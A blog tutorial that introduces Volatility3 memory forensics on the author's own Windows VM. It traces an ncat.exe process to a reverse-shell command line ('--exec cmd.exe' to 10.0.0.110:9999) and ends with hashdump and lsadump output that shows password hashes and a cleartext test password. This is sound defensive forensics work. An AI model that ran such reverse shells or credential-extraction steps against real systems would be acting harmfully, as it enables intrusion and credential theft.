Friday, March 18, 2022

Beginning Volatility3 Memory Forensics

In this post, I'm taking a quick look at Volatility3, to understand its capabilities.

First up, obtaining Volatility3 via GitHub.

┌──(securitynik㉿securitynik)-[~]
└─$ git clone https://github.com/volatilityfoundation/volatility3.git

Next up, get an image. For this, I will take a memory dump of my own virtual machine, using Comae's Toolkit DumpIt.exe

C:\TMP
λ y:\Comae-Toolkit-Light-3.0.20180307.1\x64\DumpIt.exe

  DumpIt 3.0.20180307.1
  Copyright (C) 2007 - 2017, Matthieu Suiche <http://www.msuiche.net>
  Copyright (C) 2012 - 2014, MoonSols Limited <http://www.moonsols.com>
  Copyright (C) 2015 - 2017, Comae Technologies FZE <http://www.comae.io>

    Destination path:           \??\C:\TMP\SECURITYNIK-WIN-20220225-182235.dmp

    Computer name:              SECURITYNIK-WIN


    --> Proceed with the acquisition ? [y/n] y

    [+] Information:
    Dump Type:                   Microsoft Crash Dump


    [+] Machine Information:
    Windows version:             10.0.19044
    MachineId:                   88688394-D237-438C-92E3-06D84FF93CE9
    TimeStamp:                   132902869567075443
    Cr3:                         0x1aa000
    KdCopyDataBlock:             0xfffff8054df0e2e8
    KdDebuggerData:              0xfffff8054e603b20
    KdpDataBlockEncoded:         0xfffff8054e653b28

    Current date/time:          [2022-02-25 (YYYY-MM-DD) 18:22:36 (UTC)]
    + Processing... Done.

    Acquisition finished at:    [2022-02-25 (YYYY-MM-DD) 18:22:50 (UTC)]
    Time elapsed:               0:14 minutes:seconds (14 secs)

    Created file size:           2147020800 bytes (2047 Mb)
    Total physical memory size:  2047 Mb

    NtStatus (troubleshooting):   0x00000000
    Total of written pages:        524173
    Total of inacessible pages:         0
    Total of accessible pages:     524173

    SHA-256: A943219879526515F889BA2707699391132EC648E9C3B1B34C45A50DAB0BA6A3

    JSON path:                  C:\TMP\SECURITYNIK-WIN-20220225-182235.json

Now that I have the memory image, first step is to get some help on how to usethe tool.

Setup a symbolic link for volatility3

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ sudo ln --symbolic ~/volatility3/vol.py /usr/bin/vol3

Getting some help!

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --help | more                                                                                                                       
Volatility 3 Framework 2.0.2
usage: volatility [-h] [-c CONFIG] [--parallelism [{processes,threads,off}]]
                  [-e EXTEND] [-p PLUGIN_DIRS] [-s SYMBOL_DIRS] [-v] [-l LOG]
                  [-o OUTPUT_DIR] [-q] [-r RENDERER] [-f FILE]
                  [--write-config] [--clear-cache] [--cache-path CACHE_PATH]
                  [--offline] [--single-location SINGLE_LOCATION]
                  [--stackers [STACKERS ...]]
                  [--single-swap-locations [SINGLE_SWAP_LOCATIONS ...]]
                  plugin ...

An open-source memory forensics framework
....

With an understanding of the basic usage of the tool in place, time to use it. First up, getting information on the image.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.info.Info
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
Variable        Value

Kernel Base     0xf8054da03000
DTB     0x1aa000
Symbols file:///home/securitynik/volatility3/volatility3/symbols/windows/ntkrnlmp.pdb/3177D31000BA7590DED335936C93E374-1.json.xz
Is64Bit True
IsPAE   False
layer_name      0 WindowsIntel32e
memory_layer    1 WindowsCrashDump64Layer
base_layer      2 FileLayer
KdVersionBlock  0xf8054e612378
Major/Minor     15.19041
MachineType     34404
KeNumberProcessors      1
SystemTime      2022-02-25 18:22:36
NtSystemRoot    C:\Windows
NtProductType   NtProductWinNt
NtMajorVersion  10
NtMinorVersion  0
PE MajorOperatingSystemVersion  10
PE MinorOperatingSystemVersion  0
PE Machine      34404
PE TimeDateStamp        Mon Jan 22 06:20:17 2103

Above, we can grab information such as as Windows version, date the image was taken.

Next up, looking at the processes which were running at the time this snapshot was taken. Below I've chosen to focus on ncat.exe.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.pslist.PsList
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
PID     PPID    ImageFileName   Offset(V)       Threads Handles SessionId       Wow64   CreateTime      ExitTime        File output

4       0       System  0xd187b9684040  111     -       N/A     False   2022-02-25 18:20:37.000000      N/A     Disabled
72      4       Registry        0xd187b9754040  4       -       N/A     False   2022-02-25 18:20:35.000000      N/A     Disabled
352     4       smss.exe        0xd187bcf02080  3       -       N/A     False   2022-02-25 18:20:37.000000      N/A     Disabled
444     432     csrss.exe       0xd187c01ea140  11      -       0       False   2022-02-25 18:20:39.000000      N/A     Disabled
512     432     wininit.exe     0xd187be054080  5       -       0       False   2022-02-25 18:20:39.000000      N/A     Disabled
520     504     csrss.exe       0xd187be053140  11      -       1       False   2022-02-25 18:20:39.000000      N/A     Disabled
580     504     winlogon.exe    0xd187be090080  6       -       1       False   2022-02-25 18:20:39.000000      N/A     Disabled
604     512     services.exe    0xd187be097080  10      -       0       False   2022-02-25 18:20:39.000000      N/A     Disabled
612     512     lsass.exe       0xd187be09d080  8       -       0       False   2022-02-25 18:20:39.000000      N/A     Disabled
...
4492    4756    ncat.exe        0xd187c11a5080  5       -       1       False   2022-02-25 18:22:18.000000      N/A     Disabled
4260    4492    ncat.exe        0xd187c1af3080  3       -       1       True    2022-02-25 18:22:18.000000      N/A     Disabled
4500    4260    cmd.exe 0xd187c1bc6080  2       -       1       True    2022-02-25 18:22:18.000000      N/A     Disabled
4584    3960    DumpIt.exe      0xd187c1f81080  6       -       1       False   2022-02-25 18:22:35.000000      N/A     Disabled
4636    748     WmiPrvSE.exe    0xd187c1e430c0  11      -       0       False   2022-02-25 18:22:36.000000      N/A     Disabled

Looking at the processes via the psscan plugin.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.psscan.PsScan
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
PID     PPID    ImageFileName   Offset(V)       Threads Handles SessionId       Wow64   CreateTime      ExitTime        File output

4       0       System  0xd187b9684040  111     -       N/A     False   2022-02-25 18:20:37.000000      N/A     Disabled
72      4       Registry        0xd187b9754040  4       -       N/A     False   2022-02-25 18:20:35.000000      N/A     Disabled
352     4       smss.exe        0xd187bcf02080  3       -       N/A     False   2022-02-25 18:20:37.000000      N/A     Disabled
520     504     csrss.exe       0xd187be053140  11      -       1       False   2022-02-25 18:20:39.000000      N/A     Disabled
512     432     wininit.exe     0xd187be054080  5       -       0       False   2022-02-25 18:20:39.000000      N/A     Disabled
580     504     winlogon.exe    0xd187be090080  6       -       1       False   2022-02-25 18:20:39.000000      N/A     Disabled
604     512     services.exe    0xd187be097080  10      -       0       False   2022-02-25 18:20:39.000000      N/A     Disabled
612     512     lsass.exe       0xd187be09d080  8       -       0       False   2022-02-25 18:20:39.000000      N/A     Disabled
...
4492    4756    ncat.exe        0xd187c11a5080  5       -       1       False   2022-02-25 18:22:18.000000      N/A     Disabled
...
3960    3304    cmd.exe 0xd187c1aed080  3       -       1       False   2022-02-25 18:21:10.000000      N/A     Disabled
4260    4492    ncat.exe        0xd187c1af3080  3       -       1       True    2022-02-25 18:22:18.000000      N/A     Disabled
...
4500    4260    cmd.exe 0xd187c1bc6080  2       -       1       True    2022-02-25 18:22:18.000000      N/A     Disabled
4756    4696    cmd.exe 0xd187c1cef080  4       -       1       False   2022-02-25 18:21:55.000000      N/A     Disabled
...
4584    3960    DumpIt.exe      0xd187c1f81080  6       -       1       False   2022-02-25 18:22:35.000000      N/A     Disabled

Looking at the established network connections during the time of acquisition with a focus on the process associated with ncat.exe.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.netstat.NetStat 
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
Offset  Proto   LocalAddr       LocalPort       ForeignAddr     ForeignPort     State   PID     Owner   Created

0xd187bff9e730  TCPv4   10.0.0.102      49671   10.0.0.110      9999    ESTABLISHED     4260    ncat.exe        2022-02-25 18:22:18.000000 
....

Above, there is one established connection with process PID 4260. I will come back to this shortly. Taking another look at the network statistics.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.netscan.NetScan                                                   
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
Offset  Proto   LocalAddr       LocalPort       ForeignAddr     ForeignPort     State   PID     Owner   Created

0xd187b9697b50  TCPv4   0.0.0.0 5357    0.0.0.0 0       LISTENING       4       System  2022-02-25 18:20:41.000000 
0xd187b9697b50  TCPv6   ::      5357    ::      0       LISTENING       4       System  2022-02-25 18:20:41.000000 
0xd187b9697cb0  TCPv4   0.0.0.0 49668   0.0.0.0 0       LISTENING       1832    spoolsv.exe     2022-02-25 18:20:43.000000 
0xd187bc7a0050  TCPv4   10.0.0.102      139     0.0.0.0 0       LISTENING       4       System  2022-02-25 18:20:40.000000 
0xd187bc7a01b0  TCPv4   0.0.0.0 49668   0.0.0.0 0       LISTENING       1832    spoolsv.exe     2022-02-25 18:20:43.000000 
0xd187bc7a01b0  TCPv6   ::      49668   ::      0       LISTENING       1832    spoolsv.exe     2022-02-25 18:20:43.000000 
...
0xd187c1e3c4b0  UDPv4   127.0.0.1       1900    *       0               1560    svchost.exe     2022-02-25 18:22:35.000000 
0xd187c1e3d2c0  UDPv6   ::1     1900    *       0               1560    svchost.exe     2022-02-25 18:22:35.000000 

Focusing on the previously identified PID 4260.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.pslist.PsList --pid 4260
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
PID     PPID    ImageFileName   Offset(V)       Threads Handles SessionId       Wow64   CreateTime      ExitTime        File output

4260    4492    ncat.exe        0xd187c1af3080  3       -       1       True    2022-02-25 18:22:18.000000      N/A     Disabled

Did the process with PID 4260 spawn any other processes? Let's grep on all the processes to see if anything matches. Obviously, a better view would have been to use the process tree via windows.pstree.PsTree. However, this returned some error. So I had to find an alternate path.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.pslist.PsList | grep 4260
4260    4492    ncat.exe        0xd187c1af3080  3       -       1       True    2022-02-25 18:22:18.000000      N/A     Disabled
4500    4260    cmd.exe         0xd187c1bc6080  2       -       1       True    2022-02-25 18:22:18.000000      N/A     Disabled

Looks like ncat.exe spawned a cmd.exe. Time to dig even deeper into ncat.exe to see what the command line looks like.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.cmdline.CmdLine --pid 4260                                                       
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
PID     Process Args

4260    ncat.exe        "C:\ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe" --verbose 10.0.0.110 9999 --exec cmd.exe

Above, we see ncat.exe command line involved cmd.exe. We also see the IP address of 10.0.0.110 on port 9999. This is good information so far.

Looking at the command line for cmd.exe with PID 4500

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.cmdline.CmdLine --pid 4500
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
PID     Process Args

4500    cmd.exe cmd.exe

Above shows nothing as interesting as the command line for ncat.exe.

Looking at the DLLs being loaded by ncat.exe.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.dlllist.DllList --pid 4260
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
PID     Process         Base            Size            Name            Path                                                                                LoadTime                        File output

4260    ncat.exe        0x730000        0x1a1000        ncat.exe        C:\ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe      2022-02-25 18:22:18.000000      Disabled
4260    ncat.exe        0x7ffe2ab70000  0x1f5000        ntdll.dll       C:\Windows\SYSTEM32\ntdll.dll   2022-02-25 18:22:18.000000      Disabled
4260    ncat.exe        0x7ffe2a810000  0x59000         wow64.dll       C:\Windows\System32\wow64.dll   2022-02-25 18:22:18.000000      Disabled
4260    ncat.exe        0x7ffe29950000  0x83000         wow64win.dll    C:\Windows\System32\wow64win.dll                                                     2022-02-25 18:22:18.000000      Disabled
4260    ncat.exe        0x771d0000      0xa000          wow64cpu.dll    C:\Windows\System32\wow64cpu.dll                                                     2022-02-25 18:22:18.000000      Disabled

Looking at the DLLs for the cmd.exe process with PID 4500

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.dlllist.DllList --pid 4500
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
PID     Process Base    Size    Name    Path    LoadTime        File output

4500    cmd.exe 0x1000000       0x5a000 cmd.exe C:\Windows\SysWOW64\cmd.exe     2022-02-25 18:22:18.000000      Disabled
4500    cmd.exe 0x7ffe2ab70000  0x1f5000        ntdll.dll       C:\Windows\SYSTEM32\ntdll.dll   2022-02-25 18:22:18.000000      Disabled
4500    cmd.exe 0x7ffe2a810000  0x59000 wow64.dll       C:\Windows\System32\wow64.dll   2022-02-25 18:22:18.000000      Disabled
4500    cmd.exe 0x7ffe29950000  0x83000 wow64win.dll    C:\Windows\System32\wow64win.dll        2022-02-25 18:22:18.000000      Disabled
4500    cmd.exe 0x771d0000      0xa000  wow64cpu.dll    C:\Windows\System32\wow64cpu.dll        2022-02-25 18:22:18.000000      Disabled

Looking at the modules

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.ldrmodules.LdrModules --pid 4260
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
Pid     Process Base    InLoad  InInit  InMem   MappedPath

4260    ncat.exe        0x75c20000      False   False   False   \Windows\SysWOW64\KernelBase.dll
4260    ncat.exe        0x730000        True    False   True    \ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe
4260    ncat.exe        0x1400000       False   False   False   \Windows\SysWOW64\winnlsres.dll
4260    ncat.exe        0x1410000       False   False   False   \Windows\System32\en-US\winnlsres.dll.mui
4260    ncat.exe        0x73a70000      False   False   False   \Windows\SysWOW64\apphelp.dll
4260    ncat.exe        0x10000000      False   False   False   \Windows\SysWOW64\pcapwsp.dll
4260    ncat.exe        0x75180000      False   False   False   \Windows\SysWOW64\kernel32.dll
4260    ncat.exe        0x745e0000      False   False   False   \Windows\SysWOW64\cryptsp.dll
4260    ncat.exe        0x74500000      False   False   False   \Windows\SysWOW64\mswsock.dll
4260    ncat.exe        0x73b20000      False   False   False   \Windows\SysWOW64\cryptbase.dll
4260    ncat.exe        0x74560000      False   False   False   \Windows\SysWOW64\rsaenh.dll
4260    ncat.exe        0x750a0000      False   False   False   \Windows\SysWOW64\gdi32full.dll
4260    ncat.exe        0x747b0000      False   False   False   \Windows\SysWOW64\version.dll
4260    ncat.exe        0x759d0000      False   False   False   \Windows\SysWOW64\gdi32.dll
4260    ncat.exe        0x75830000      False   False   False   \Windows\SysWOW64\user32.dll
4260    ncat.exe        0x75b60000      False   False   False   \Windows\SysWOW64\msvcrt.dll
4260    ncat.exe        0x771e0000      False   False   False   \Windows\SysWOW64\ntdll.dll
4260    ncat.exe        0x763e0000      False   False   False   \Windows\SysWOW64\advapi32.dll
4260    ncat.exe        0x75ee0000      False   False   False   \Windows\SysWOW64\msvcp_win.dll
4260    ncat.exe        0x75e60000      False   False   False   \Windows\SysWOW64\sechost.dll
4260    ncat.exe        0x75e40000      False   False   False   \Windows\SysWOW64\bcrypt.dll
4260    ncat.exe        0x762a0000      False   False   False   \Windows\SysWOW64\imm32.dll
4260    ncat.exe        0x762d0000      False   False   False   \Windows\SysWOW64\bcryptprimitives.dll
4260    ncat.exe        0x766e0000      False   False   False   \Windows\SysWOW64\rpcrt4.dll
4260    ncat.exe        0x766c0000      False   False   False   \Windows\SysWOW64\win32u.dll
4260    ncat.exe        0x76460000      False   False   False   \Windows\SysWOW64\ucrtbase.dll
4260    ncat.exe        0x76cf0000      False   False   False   \Windows\SysWOW64\ws2_32.dll
4260    ncat.exe        0x771d0000      True    True    True    \Windows\System32\wow64cpu.dll
4260    ncat.exe        0x7e110000      False   False   False   \Tools\Cmder\vendor\conemu-maximus5\ConEmu\ConEmuHk.dll
4260    ncat.exe        0x7ffe2a810000  True    True    True    \Windows\System32\wow64.dll
4260    ncat.exe        0x7ffe29950000  True    True    True    \Windows\System32\wow64win.dll
4260    ncat.exe        0x7ffe2ab70000  True    True    True    \Windows\System32\ntdll.dll

Nothing seems out of the way above. Dumping the files associated with ncat.exe

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.dumpfiles.DumpFiles --pid 4260
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
Cache   FileObject      FileName        Result

ImageSectionObject      0xd187bfc10bb0  KernelBase.dll  file.0xd187bfc10bb0.0xd187bcf3a770.ImageSectionObject.KernelBase.dll.img
DataSectionObject       0xd187c14add70  ncat.exe        Error dumping file
ImageSectionObject      0xd187c14add70  ncat.exe        file.0xd187c14add70.0xd187b96c9a20.ImageSectionObject.ncat.exe.img
...

With the files dumped, taking a closer look at the files.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ ls | grep ncat
file.0xd187c14add70.0xd187b96c9a20.ImageSectionObject.ncat.exe.img
file.0xd187c14add70.0xd187c1fc7c10.DataSectionObject.ncat.exe.dat
...

Using the file command to identify two files above

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ file  file.0xd187c14add70.0xd187b96c9a20.ImageSectionObject.ncat.exe.img \
> file.0xd187c14add70.0xd187c1fc7c10.DataSectionObject.ncat.exe.dat
file.0xd187c14add70.0xd187b96c9a20.ImageSectionObject.ncat.exe.img: PE32 executable (console) Intel 80386, for MS Windows
file.0xd187c14add70.0xd187c1fc7c10.DataSectionObject.ncat.exe.dat:  PE32 executable (console) Intel 80386, for MS Windows

We can see the files are being reported as a PE32 executable. Good start.

A different view of file information.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.filescan.FileScan | grep -i ncat                                                 
0xd187c14add70.0\ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe   216
0xd187c1e11be0  \ProgramData\chocolatey\bin\ncat.exe    216
0xd187c1e279e0  \Windows\Prefetch\NCAT.EXE-4B4B887F.pf  216
0xd187c1e2a280  \ProgramData\chocolatey\bin\ncat.exe    216
0xd187c1e32750  \Windows\Prefetch\NCAT.EXE-1B3976EF.pf  216
0xd187c1e34820  \ncat-0 216
0xd187c1e349b0  \ncat-0 216

We see at least there is information on the path of the file as well as their is a prefetch entry.

Looking at the MFTScan plugin.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.mftscan.MFTScan | grep -i ncat
* 0xbb0681ad38b00       FILE    104014an2ing finFiled   Archive FILE_NAME       2022-02-05 20:57:48.000000      2022-02-05 20:57:48.000000  2022-02-05 20:57:48.000000       2022-02-05 20:57:48.000000      ncat.exe.log
* 0xbb0681ad3928        FILE    104014  2       File    Archive FILE_NAME       2022-02-05 20:57:48.000000      2022-02-05 20:57:48.000000  2022-02-05 20:57:48.000000       2022-02-05 20:57:48.000000      NCATEX~1.LOG
...
* 0xbb0688e7c920        FILE    105970  2       File    Archive FILE_NAME       2022-02-25 18:15:47.000000      2022-02-25 18:15:47.000000  2022-02-25 18:15:47.000000       2022-02-25 18:15:47.000000      NCAT.EXE-1B3976EF.pf
* 0xbb0688e7d8b0        FILE    105974  2       File    Archive FILE_NAME       2022-02-25 18:15:47.000000      2022-02-25 18:15:47.000000  2022-02-25 18:15:47.000000       2022-02-25 18:15:47.000000      NCATEX~2.PF
* 0xbb0688e7d920        FILE    105974  2       File    Archive FILE_NAME       2022-02-25 18:15:47.000000      2022-02-25 18:15:47.000000  2022-02-25 18:15:47.000000       2022-02-25 18:15:47.000000      NCAT.EXE-4B4B887F.pf

Looking at the environment variables for the ncat.exe process with PID 4260

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.envars.Envars --pid 4260
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
PID     Process Block   Variable        Value

...
4260    ncat.exe        0x14a4810       LOCALAPPDATA    C:\Users\SecurityNik\AppData\Local
...
4260    ncat.exe        0x14a4810       OS      Windows_NT
...
4260    ncat.exe        0x14a4810       USERDOMAIN      SECURITYNIK-WIN
4260    ncat.exe        0x14a4810       USERDOMAIN_ROAMINGPROFILE       SECURITYNIK-WIN
4260    ncat.exe        0x14a4810       USERNAME        SecurityNik
4260    ncat.exe        0x14a4810       USERPROFILE     C:\Users\SecurityNik
4260    ncat.exe        0x14a4810       user_aliases    C:\Tools\Cmder\config\user_aliases.cmd
4260    ncat.exe        0x14a4810       USER_BUILD      windows.1
4260    ncat.exe        0x14a4810       USER_MAJOR      2
4260    ncat.exe        0x14a4810       USER_MINOR      34
4260    ncat.exe        0x14a4810       USER_PATCH      1
4260    ncat.exe        0x14a4810       VENDORED_BUILD  windows.1
4260    ncat.exe        0x14a4810       VENDORED_MAJOR  2
4260    ncat.exe        0x14a4810       VENDORED_MINOR  29
4260    ncat.exe        0x14a4810       VENDORED_PATCH  1
4260    ncat.exe        0x14a4810       verbose_output  0
...

Getting information on the user and the permission the ncat.exe process is running with.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.getsids.GetSIDs --pid 4260                                                      
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
PID     Process SID     Name

4260    ncat.exe        S-1-5-21-3036856633-148622980-1367235899-1001   SecurityNik
4260    ncat.exe        S-1-5-21-3036856633-148622980-1367235899-513    Domain Users
4260    ncat.exe        S-1-1-0 Everyone
4260    ncat.exe        S-1-5-114       Local Account (Member of Administrators)
4260    ncat.exe        S-1-5-32-544    Administrators
4260    ncat.exe        S-1-5-32-545    Users
4260    ncat.exe        S-1-5-4 Interactive
4260    ncat.exe        S-1-2-1 Console Logon (Users who are logged onto the physical console)
4260    ncat.exe        S-1-5-11        Authenticated Users
4260    ncat.exe        S-1-5-15        This Organization
4260    ncat.exe        S-1-5-113       Local Account
4260    ncat.exe        S-1-5-5-0-184823        Logon Session
4260    ncat.exe        S-1-2-0 Local (Users with the ability to log in locally)
4260    ncat.exe        S-1-5-64-10     NTLM Authentication
4260    ncat.exe        S-1-16-12288    High Mandatory Level

Above, we see the the user is SecurityNik and is also a member of the local Administrators group. Additionally, ncat.exe is running with High Mandatory Level.

Taking a deeper look at the privileges.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp  windows.privileges.Privs --pid 4260 
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
PID     Process Value   Privilege       Attributes      Description

4260    ncat.exe        2       SeCreateTokenPrivilege          Create a token object
4260    ncat.exe        3       SeAssignPrimaryTokenPrivilege           Replace a process-level token
4260    ncat.exe        4       SeLockMemoryPrivilege           Lock pages in memory
4260    ncat.exe        5       SeIncreaseQuotaPrivilege        Present Increase quotas
4260    ncat.exe        6       SeMachineAccountPrivilege               Add workstations to the domain
4260    ncat.exe        7       SeTcbPrivilege          Act as part of the operating system
4260    ncat.exe        8       SeSecurityPrivilege     Present Manage auditing and security log
4260    ncat.exe        9       SeTakeOwnershipPrivilege        Present Take ownership of files/objects
4260    ncat.exe        10      SeLoadDriverPrivilege   Present Load and unload device drivers
4260    ncat.exe        11      SeSystemProfilePrivilege        Present Profile system performance
4260    ncat.exe        12      SeSystemtimePrivilege   Present Change the system time
4260    ncat.exe        13      SeProfileSingleProcessPrivilege Present Profile a single process
4260    ncat.exe        14      SeIncreaseBasePriorityPrivilege Present Increase scheduling priority
4260    ncat.exe        15      SeCreatePagefilePrivilege       Present Create a pagefile
4260    ncat.exe        16      SeCreatePermanentPrivilege              Create permanent shared objects
4260    ncat.exe        17      SeBackupPrivilege       Present Backup files and directories
4260    ncat.exe        18      SeRestorePrivilege      Present Restore files and directories
4260    ncat.exe        19      SeShutdownPrivilege     Present Shut down the system
4260    ncat.exe        20      SeDebugPrivilege        Present Debug programs
4260    ncat.exe        21      SeAuditPrivilege                Generate security audits
4260    ncat.exe        22      SeSystemEnvironmentPrivilege    Present Edit firmware environment values
4260    ncat.exe        23      SeChangeNotifyPrivilege Present,Enabled,Default Receive notifications of changes to files or directories
4260    ncat.exe        24      SeRemoteShutdownPrivilege       Present Force shutdown from a remote system
4260    ncat.exe        25      SeUndockPrivilege       Present Remove computer from docking station
4260    ncat.exe        26      SeSyncAgentPrivilege            Synch directory service data
4260    ncat.exe        27      SeEnableDelegationPrivilege             Enable user accounts to be trusted for delegation
4260    ncat.exe        28      SeManageVolumePrivilege Present Manage the files on a volume
4260    ncat.exe        29      SeImpersonatePrivilege  Present,Enabled,Default Impersonate a client after authentication
4260    ncat.exe        30      SeCreateGlobalPrivilege Present,Enabled,Default Create global objects
4260    ncat.exe        31      SeTrustedCredManAccessPrivilege         Access Credential Manager as a trusted caller
4260    ncat.exe        32      SeRelabelPrivilege              Modify the mandatory integrity level of an object
4260    ncat.exe        33      SeIncreaseWorkingSetPrivilege   Present Allocate more memory for user applications
4260    ncat.exe        34      SeTimeZonePrivilege     Present Adjust the time zone of the computer's internal clock
4260    ncat.exe        35      SeCreateSymbolicLinkPrivilege   Present Required to create a symbolic link
4260    ncat.exe        36      SeDelegateSessionUserImpersonatePrivilege       Present Obtain an impersonation token for another user in the same session.

Quite a lot of privileges. This helps to confirm above, that the process is running with high integrity.

Looking at handles the ncat.exe process has opened.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.handles.Handles --pid 4260
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
PID     Process Offset  HandleValue     Type    GrantedAccess   Name

...
4260    ncat.exe        0xd187c1e33d30  0x94    File    0x100020        \Device\HarddiskVolume2\Users\SecurityNik
...
4260    ncat.exe        0xd187c13b76e0  0x1f8   Event   0x1f0003
4260    ncat.exe        0xd187c1e34690  0x1fc   File    0x120089        \Device\NamedPipe\
4260    ncat.exe        0xd187c1e34500  0x204   File    0x120196        \Device\NamedPipe
4260    ncat.exe        0xd187c1e34820  0x208   File    0x120089        \Device\NamedPipe\ncat-0
4260    ncat.exe        0xd187c10dd400  0x210   Mutant  0x1f0001
4260    ncat.exe        0xd187c1bc6080  0x214   Process 0x1fffff        ncat.exe Pid 4500
...
USER\S-1-5-21-3036856633-148622980-1367235899-1001\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION
4260    ncat.exe        0xd187c1f5ef60  0x228   Event   0x1f0003
4260    ncat.exe        0xd187c13b8de0  0x22c   Event   0x1f0003

Let's now extract any credentials from the host, using hashdump

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.hashdump.Hashdump
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
User                rid     lmhash                                  nthash

Administrator       500     aad3b435b51404eeaad3b435b51404ee        31d6cfe0d16ae931b73c59d7e0c089c0
Guest               501     aad3b435b51404eeaad3b435b51404ee        31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount      503     aad3b435b51404eeaad3b435b51404ee        31d6cfe0d16ae931b73c59d7e0c089c0
WDAGUtilityAccount  504     aad3b435b51404eeaad3b435b51404ee        c2622233208f902795d9ad5bde22b628
SecurityNik         1001    aad3b435b51404eeaad3b435b51404ee        23e1d10001876b0078a9a779017fc026

Looking for credentials in the lsass.exe process.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp  windows.lsadump.Lsadump
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
Key                 Secret                                          Hex

DefaultPassword     Testing1%òvÌBhúmÃfTî                            10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 00 65 00 73 00 74 00 69 00 6e 00 67 00 31 00 25 f2 1f 76 83 cc a0 08 42 68 fa 6d c3 66 54 ee
DPAPI_SYSTEM        ,ÀC³▒N#0t"íãܺÈÕÿs/É▒I[ÌÕؤqôUMn                2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 c0 43 b3 1a 05 9e 4e 23 30 74 22 9b e6 ed e3 dc ba c8 1d d5 ff 73 9c 2f c9 1a 49 0f 5b cc d5 d8 7f a4 94 71 f4 55 4d 6e 00 00 00 00
L$_RasConnectionCredentials#0   88[`Þ6Ù5N½Â§^)nTesting1             38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 05 00 5b 60 de 36 d9 98 35 4e bd c2 a7 15 5e 81 29 6e 12 00 00 00 54 00 65 00 73 00 74 00 69 00 6e 00 67 00 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
